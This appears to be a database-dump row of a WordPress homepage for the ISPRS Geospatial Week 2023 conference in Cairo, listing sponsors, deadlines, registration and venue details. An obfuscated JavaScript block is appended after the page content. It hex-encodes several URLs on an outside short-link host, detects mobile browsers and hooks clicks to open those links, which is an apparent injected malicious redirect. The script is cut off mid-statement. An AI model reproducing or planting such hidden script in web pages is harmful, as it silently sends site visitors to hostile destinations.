(4537,1,'2023-05-17 05:57:59','2023-05-17 05:57:59','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 